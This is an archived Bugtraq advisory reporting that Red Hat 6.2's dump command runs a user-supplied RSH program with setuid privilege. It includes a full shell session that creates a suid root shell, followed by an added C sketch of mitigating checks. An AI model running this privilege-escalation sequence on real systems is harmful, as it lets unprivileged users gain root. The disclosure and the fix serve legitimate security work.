5663064 2000-10-31 14:37 +0900  /36 lines/ JW Oh <mat@IVNTECH.COM>
Sent by: joel@lysator.liu.se
Imported: 2000-10-31  18:51  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: mat@IVNTECH.COM
Recipient: Bugtraq (import) <13520>
Subject: Redhat 6.2 dump command executes external program with suid privilege.
------------------------------------------------------------
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10010311436050.31338-100000@ivntech.com>

1. Problem:
 Linux dump command executes external program with suid privilege.
2. Tested Version
 dump-0.4b15
3. Example
 [mat@localhost mat]$ export TAPE=garbage:garbage
 [mat@localhost mat]$ export RSH=/home/mat/execute_this
 [mat@localhost mat]$ cat > /home/mat/execute_this
 #!/bin/sh
 cp /bin/sh /home/mat/sh
 chmod 4755 /home/mat/sh
 [mat@localhost mat]$ chmod 755 /home/mat/execute_this
 [mat@localhost mat]$ /sbin/dump -0 /
   DUMP: Connection to garbage established.
   DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
   DUMP: Date of last level 0 dump: the epoch
   DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
   DUMP: Label: none
 /dev/hda2: Permission denied while opening filesystem
 [mat@localhost mat]$ ls -la /home/mat/sh
 -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
 [mat@localhost mat]$ /home/mat/sh
 bash# id
 uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
=================================================
|                                               |
|               mat@hacksware.com               |
|                                               |
=================================================
(5663064) ------------------------------------------
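
Added example, not part of the original post and not code from the dump project: a C sketch of the two checks whose absence the session above demonstrates, namely ignoring a caller-supplied RSH when the process runs set-id and permanently dropping privileges before any helper program is executed. The names pick_rsh, drop_privs and the DEFAULT_RSH path are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed default path; not taken from the dump source. */
#define DEFAULT_RSH "/usr/bin/rsh"

/* Choose the remote-shell program. When real and effective ids differ the
 * process is running set-id, so the caller-controlled RSH value is ignored. */
const char *pick_rsh(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid,
                     const char *env_rsh)
{
    if (ruid != euid || rgid != egid)
        return DEFAULT_RSH;
    if (env_rsh == NULL || env_rsh[0] == '\0')
        return DEFAULT_RSH;
    return env_rsh;
}

/* Permanently give up set-id privileges: group first, then user, then
 * confirm root cannot be regained. Returns 0 on success, -1 on failure. */
int drop_privs(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    if (geteuid() != ruid || getegid() != rgid)
        return -1;
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

int main(void)
{
    const char *rsh = pick_rsh(getuid(), geteuid(), getgid(), getegid(),
                               getenv("RSH"));
    if (drop_privs() != 0) {
        fprintf(stderr, "cannot drop privileges\n");
        return 1;
    }
    /* A real program would fork and exec the helper here, after the drop. */
    printf("remote shell program: %s%s\n", rsh,
           strcmp(rsh, DEFAULT_RSH) ? " (from RSH)" : " (default)");
    return 0;
}
```

Either check alone stops the helper from running with euid 0; applying both means a mistake in one is covered by the other.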